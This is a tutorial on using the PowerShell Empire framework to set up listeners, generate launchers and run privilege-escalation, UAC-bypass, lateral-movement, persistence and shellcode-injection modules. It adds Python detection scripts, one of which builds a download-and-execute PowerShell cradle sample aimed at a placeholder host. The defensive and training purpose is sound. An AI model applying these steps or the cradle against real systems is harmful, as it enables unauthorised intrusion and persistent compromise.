PowerShell Empire for Beginners: A Comprehensive Guide
Foreword
PowerShell Empire, usually just called "Empire," is a post-exploitation framework aimed at Windows targets. Its agent runs PowerShell code without having to launch powershell.exe, which matters for defenders because a detection that keys only on that process will not see it. In this article we look at Empire's features, its modules, and how they are used.
Getting Started with PowerShell Empire
Empire runs on Linux, but CentOS environments are not recommended. Before installing, read the install.sh script: it fetches a large number of packages from remote sources, and you should know what it pulls down before you run it. A Debian-based distribution such as Ubuntu or Kali Linux is recommended. To install, clone the repository:
git clone https://github.com/EmpireProject/Empire.git
Change into the Empire directory and run ./install.sh. The script installs the required packages and takes some time to complete. When it finishes, you are prompted for a server password, with a randomly generated one offered.
Understanding PowerShell Empire Modules
The latest version of PowerShell Empire ships over 280 modules, among them exploitation, code execution, information collection, credential acquisition, privilege escalation, persistence and lateral movement modules. Before using Empire it is worth understanding what each module category does and which of them you actually need.
Setting Up a Listener
To set up a listener, enter the listeners menu; typing uselistener and pressing the Tab key shows the available listener types. Choose http, set the Name and Host parameters with the set command, and start the listener with execute. For example (ip stands for the address the agents will call back to):
(Empire: listeners)> uselistener http
(Empire: listeners/http)> set Name xiaobai
(Empire: listeners/http)> set Host ip
(Empire: listeners/http)> execute
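From the defender's side, what the listener above exposes on the wire is its HTTP profile: the request URIs the agent polls and the User-Agent string it presents. The Python below is an added example, not code from this article or from the Empire project. It assumes the default profile of Empire 2.x as I recall it (three URIs plus an Internet Explorer 11 User-Agent); confirm the values with info on your own listener, since operators change them. The proxy log lines and addresses are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Assumed Empire 2.x default http listener profile: polled URIs and the
# User-Agent the agent sends. Verify against `info` on the real listener.
DEFAULT_URIS = {"/admin/get.php", "/news.php", "/login/process.php"}
DEFAULT_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"

# Constructed proxy log (not real traffic): ts client method url status "user-agent"
SAMPLE_LOG = """\
2024-01-01T10:00:01Z 10.0.0.5 GET http://203.0.113.10/admin/get.php 200 "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2024-01-01T10:00:06Z 10.0.0.5 GET http://203.0.113.10/news.php 200 "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2024-01-01T10:00:07Z 10.0.0.7 GET http://example.org/news.php 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/120.0"
2024-01-01T10:00:11Z 10.0.0.5 POST http://203.0.113.10/login/process.php 200 "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2024-01-01T10:00:12Z 10.0.0.9 GET http://example.org/index.html 200 "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')


def parse_line(line):
    """Split one constructed proxy log line into a record, or None if malformed."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, client, method, url, status, ua = m.groups()
    parts = urlsplit(url)
    return {"ts": ts, "client": client, "method": method, "host": parts.hostname,
            "path": parts.path, "status": int(status), "ua": ua}


def score_request(rec):
    """Return the list of profile indicators a single request matches."""
    reasons = []
    if rec["path"] in DEFAULT_URIS:
        reasons.append("default-profile-uri")
    if rec["ua"] == DEFAULT_UA:
        reasons.append("default-profile-user-agent")
    return reasons


def find_beacons(log_text, min_hits=2):
    """Count requests per (client, host) that match BOTH indicators and
    return the pairs seen at least min_hits times."""
    counts = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if len(score_request(rec)) == 2:  # URI and User-Agent both match
            key = (rec["client"], rec["host"])
            counts[key] = counts.get(key, 0) + 1
    return {k: v for k, v in counts.items() if v >= min_hits}


if __name__ == "__main__":
    for (client, host), n in find_beacons(SAMPLE_LOG).items():
        print(f"{client} -> {host}: {n} requests matching the default profile")
```

Either indicator on its own is weak (/news.php is an ordinary path and that User-Agent is a genuine IE11 string), so the function only flags a client/host pair that repeatedly presents both. A production rule would add beacon-interval analysis on the timestamps and compare against the profile your own Empire instance was configured with.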
Generating a Stager (Trojan Horse)
To generate a stager, use the launcher command from the listeners menu, giving the launcher type and the name of the listener it should connect back to (the usestager menu offers further stager formats). For example:
(Empire: listeners)> launcher powershell xiaobai
This prints a PowerShell one-liner; with usestager you can instead produce a file such as a .dll or .bat. Whichever form is used, it is delivered to and run on the target system, which then checks in to the listener as an agent.
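The launcher printed above is a PowerShell command line carrying a no-profile flag, a hidden window and an encoded command, and decoding that payload is the first step of triage on the endpoint. The Python below is an added example for defenders, not code from this article or from Empire: it decodes -enc payloads (PowerShell expects UTF-16LE under the base64) and scores a process-creation command line on its flags and on the contents of the decoded script. Both command lines are constructed samples; the encoded script is a placeholder pointing at an .invalid host, not a real stager.

```python
import base64
import re

# Flags that launcher-style invocations pass to powershell.exe.
FLAG_RE = re.compile(r"(?i)(?:^|\s)-(?:enc|encodedcommand|e|ec)\s+([A-Za-z0-9+/=]{20,})")
HIDDEN_RE = re.compile(r"(?i)-w(?:indowstyle)?\s+(?:1|hidden)")
NOPROFILE_RE = re.compile(r"(?i)-nop(?:rofile)?\b")

# Indicators inside the decoded script: download cradle, in-memory execution,
# and tampering with AMSI or script block logging.
SCRIPT_INDICATORS = {
    "download-cradle": re.compile(r"(?i)Net\.WebClient|DownloadString|DownloadData|Invoke-WebRequest"),
    "in-memory-exec": re.compile(r"(?i)\bIEX\b|Invoke-Expression"),
    "amsi-or-logging-tamper": re.compile(r"(?i)AmsiUtils|amsiInitFailed|ScriptBlockLogging"),
}


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries -enc <base64>, else None."""
    m = FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_command_line(cmdline):
    """Score a process-creation command line; returns score, reasons and decoded script."""
    reasons = []
    if HIDDEN_RE.search(cmdline):
        reasons.append("hidden-window")
    if NOPROFILE_RE.search(cmdline):
        reasons.append("no-profile")
    script = decode_encoded_command(cmdline)
    if script is not None:
        reasons.append("encoded-command")
        for name, rx in SCRIPT_INDICATORS.items():
            if rx.search(script):
                reasons.append(name)
    return {"score": len(reasons), "reasons": reasons, "decoded": script}


def encode_for_powershell(script):
    """Build a sample the way powershell -enc expects it (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples: a routine admin task and a launcher-shaped one-liner whose
# script body is a placeholder (an .invalid host), not an actual stager.
BENIGN = "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"
SUSPICIOUS = "powershell -noP -sta -w 1 -enc " + encode_for_powershell(
    "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/x')"
)

if __name__ == "__main__":
    for sample in (BENIGN, SUSPICIOUS):
        result = triage_command_line(sample)
        print(result["score"], result["reasons"])
```

The score is deliberately additive: a hidden window or a missing profile alone is common in legitimate scripts, while an encoded command that decodes to a download cradle plus in-memory execution is the launcher shape worth an alert. Feed it Sysmon Event ID 1 or Security 4688 command lines; the decoded script is returned so it can be stored with the alert.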
Using PowerShell Empire with Meterpreter
Empire can be combined with Meterpreter, the payload of the widely used Metasploit penetration testing framework. The Empire side is set up as above: create an http listener, generate a launcher and run it on the target so that an agent checks in. The hand-off to Meterpreter itself is done from that agent with the invoke_shellcode module, described below.
Using PowerShell Empire with Cobalt Strike
Empire can also be combined with Cobalt Strike, another popular adversary simulation framework. Again the Empire side is the same: create an http listener, generate a launcher and run it on the target to obtain an agent, then hand off to Cobalt Strike from the agent with invoke_shellcode as described below.
Using PowerShell Empire Modules
Empire's modules cover exploitation, code execution, information collection, credential acquisition and more. From an agent prompt, select a module with the usemodule command followed by its path. For example:
(Empire: 9x7N513)> usemodule code_execution/
Pressing Tab after the category prefix lists the available code execution modules.
Interacting with an Agent
Once a stager has run on a target, the target appears in the agents menu. To work with it, enter interact followed by the agent name. For example:
(Empire: agents)> interact xiaobai
This opens a prompt on that agent (agent names are normally random strings such as 9x7N513, as seen in the other prompts in this article).
Using PowerShell Empire with Meterpreter
To hand an agent off to Meterpreter, select usemodule code_execution/invoke_shellcode, set its options to match the Metasploit handler, and execute it; the module injects the Meterpreter shellcode into a process on the target system.
Using PowerShell Empire with Cobalt Strike
The same module serves Cobalt Strike: select usemodule code_execution/invoke_shellcode, supply the Beacon shellcode through the module's options, and execute it to inject that shellcode into a process on the target system.
Gathering Information
Empire's information collection modules sit under situational_awareness and its credential acquisition modules under credentials, alongside many others. Every module is selected the same way, by its full path with usemodule, and tab completion at each level shows what is available. For example:
(Empire: 97KXRTD5)> usemodule privesc/ms16-032
Here a module is selected directly; typing usemodule privesc/ and pressing Tab would list the available privilege escalation modules instead.
Privesc Module
The privesc modules handle privilege escalation. ms16-032 exploits a flaw in the Secondary Logon service that Microsoft fixed in security bulletin MS16-032, so it only succeeds on hosts missing that patch. Select it with usemodule privesc/ms16-032, then run execute.
Allchecks Module
PowerUp's allchecks also serves privilege escalation, but by enumerating common misconfigurations (weak service permissions, unquoted service paths and the like) rather than exploiting a single bug. Select it with usemodule privesc/powerup/allchecks, then run execute.
Bypass UAC Module
The bypassuac module elevates an agent running as a local administrator past User Account Control. Select it with usemodule privesc/bypassuac, then run execute.
Arpscan Module
The arpscan module discovers hosts on the local subnet by ARP. Select it with usemodule situational_awareness/network/arpscan, then run execute.
Psinject Module
The psinject module injects the agent into another process. Select it with usemodule management/psinject, then run execute.
Psexec Module
The invoke_psexec module is used for lateral movement, running the launcher on a remote host. Select it with usemodule lateral_movement/invoke_psexec, then run execute.
Registry Module
The registry persistence module writes an autorun value so the agent is restarted after a reboot; the elevated variants require administrative rights. Select it with usemodule persistence/elevated/registry, then run execute.
Schtasks Module
The schtasks module creates a scheduled task for persistence. Select it with usemodule persistence/elevated/schtasks, then run execute.
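The persistence and lateral movement modules above leave host artifacts that are easier to audit than the agent itself: a value under a Run key, a scheduled task, or a newly installed service. The Python below is an added defender example, not code from this article or from Empire. It assumes event records flattened to key=value lines in the shape of Sysmon Event ID 13 (registry value set), Security Event ID 4698 (scheduled task created) and System Event ID 7045 (service installed); the records and host names are constructed and the base64 blob is a placeholder. Including 7045 rests on the assumption that psexec-style lateral movement installs a service carrying the launcher.

```python
import re

# Constructed event records (not real logs), one per line, as key=value fields
# loosely shaped after Sysmon 13, Security 4698 and System 7045.
SAMPLE_EVENTS = """\
id=13 host=WS01 user=CORP\\alice target=HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater details="powershell -noP -w 1 -enc QUJDREVGRw=="
id=13 host=WS01 user=CORP\\alice target=HKCU\\Software\\Microsoft\\Office\\16.0\\Common\\General details="1"
id=4698 host=WS01 user=SYSTEM task=\\Updater action="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NonI -W hidden -enc QUJDREVGRw=="
id=4698 host=WS01 user=CORP\\bob task=\\Backup action="C:\\Program Files\\Backup\\backup.exe /daily"
id=7045 host=FS01 user=CORP\\svc_admin service=Updater path="%COMSPEC% /c powershell -enc QUJDREVGRw=="
id=7045 host=FS01 user=SYSTEM service=MyDriver path="C:\\Windows\\System32\\drivers\\mydrv.sys"
"""

# key=value pairs, with values optionally double-quoted.
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
# Autorun locations under HKCU or HKLM.
AUTORUN_KEY_RE = re.compile(r"(?i)\\CurrentVersion\\(?:Run|RunOnce)\\")
# A PowerShell invocation with an encoded command or a hidden window.
LAUNCHER_RE = re.compile(
    r"(?i)powershell(?:\.exe)?\b.*?(?:-enc(?:odedcommand)?\b|-w(?:indowstyle)?\s+(?:1|hidden))"
)


def parse_event(line):
    """Turn one key=value line into a dict; quoted values keep their spaces."""
    return {k: (q or v) for k, q, v in FIELD_RE.findall(line)}


def classify_event(ev):
    """Return (artifact type, suspicious) for one parsed event."""
    eid = ev.get("id")
    if eid == "13":
        if AUTORUN_KEY_RE.search(ev.get("target", "")):
            return "registry-autorun", bool(LAUNCHER_RE.search(ev.get("details", "")))
        return "registry-other", False
    if eid == "4698":
        return "scheduled-task", bool(LAUNCHER_RE.search(ev.get("action", "")))
    if eid == "7045":
        return "service-install", bool(LAUNCHER_RE.search(ev.get("path", "")))
    return "unhandled", False


def find_suspicious(text):
    """Return (host, artifact, name) for every event whose command resembles a launcher."""
    hits = []
    for line in text.splitlines():
        ev = parse_event(line)
        artifact, suspicious = classify_event(ev)
        if suspicious:
            name = ev.get("target") or ev.get("task") or ev.get("service")
            hits.append((ev.get("host"), artifact, name))
    return hits


if __name__ == "__main__":
    for host, artifact, name in find_suspicious(SAMPLE_EVENTS):
        print(f"{host}: {artifact} '{name}' runs a PowerShell launcher")
```

The three artifact types are checked with one small launcher pattern rather than a full decode, because at this stage the question is only whether an autorun, task or service starts PowerShell in launcher form; the matching events can then be pulled into the command-line triage shown earlier for the decoded payload. Sysmon 13 needs a registry rule covering the Run keys, and 4698 needs the "Other Object Access Events" audit subcategory enabled, or neither event will exist to scan.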
Conclusion
PowerShell Empire is a post-exploitation framework for Windows targets whose agent runs PowerShell code without launching powershell.exe. This article has covered its features, modules and basic usage, including how it is paired with Meterpreter and Cobalt Strike. With its wide range of modules and flexible usage, Empire is a standard tool for penetration testers and security researchers, and a useful reference for defenders building detections around the artifacts its modules leave behind.